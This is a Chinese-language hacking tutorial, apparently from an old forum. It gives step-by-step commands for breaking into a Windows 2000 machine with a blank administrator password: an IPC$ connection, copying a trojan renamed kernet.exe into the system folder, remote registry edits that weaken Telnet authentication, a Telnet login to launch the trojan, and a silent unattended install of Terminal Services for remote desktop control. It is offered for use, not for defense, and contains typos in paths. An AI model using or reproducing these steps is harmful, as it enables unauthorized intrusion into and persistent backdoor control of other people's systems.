操作系统:2000 扫描器:流光或X-SCAN等 ,再来一个木马我用的是蓝色火焰,假设我们现在已扫描出一
台有弱口令的机器,用户名是:ADMINISTRATOR 口令为:空 IP为:121.0.0.1
第一步:在命令提示符下输入:net use \\121.0.0.1\ipc$ "" /user:"administrator"成功后继续。
第二步:复制蓝色火焰的服务器端过去,我把服务器端重命名为kernet.exe,假设服务器端在C盘根目录
下,在命令提示下输入
c:\>copy kernet.exe \\121.0.0.1\admin$\systme32
成功后继续。不要关闭窗口。
第三步:开始---运行里输入regedit打开注册表,注册表菜单-- 连接网络注册表成功后,再121.0.0.1下找到
以下键值:
HEEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0下 的NTLM键,将缺省的值"2"修改
为"1"或者"0"。如果你想知道这台机器是服务器版还是专业版,可以查以下键值:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Pro ductOptions]右边窗口ProductType键
值="ServerNT就是服务器版,ProductType键值="winnt"就是专业版(是服务器版可以为它装上终端服
务,那我们就可用图形控制它了,专业版不行,等一下咱们远程登陆成功后才能装)
第四步:开始----程序----管理工具有----计算机管理体制---- 操作----连接到另一台计算机输入121.0.0.1成
功后在121.0.0.1 下双击服务和应用程序---双击服务---再双击右窗口telnet启动 它,确定。告诉大家连接
注册表和启动它的telnet服务时会有些 慢,大家不要心紧。
第五步:在命令提示符下输入 telnet 121.0.0.1会你输入用户名和密码,我们输入 administrator回车,回
车。成功登录后进入它装2000的盘如d盘,输入 d: 回车,cd winnt 回车 , cd system32回车,kernet.exe
这样就启动了木马。如果你想为它装终端服务的话输入 :
c:\>query user
这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5 \\
类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起. 如若加了/R参数主机就不会重起. 如果一切正常的
话,几分钟后对方主机将会离线,当它重新回来时, 3389终端服务就已经开启.你就可以连上去了. 安装终端
服务
|
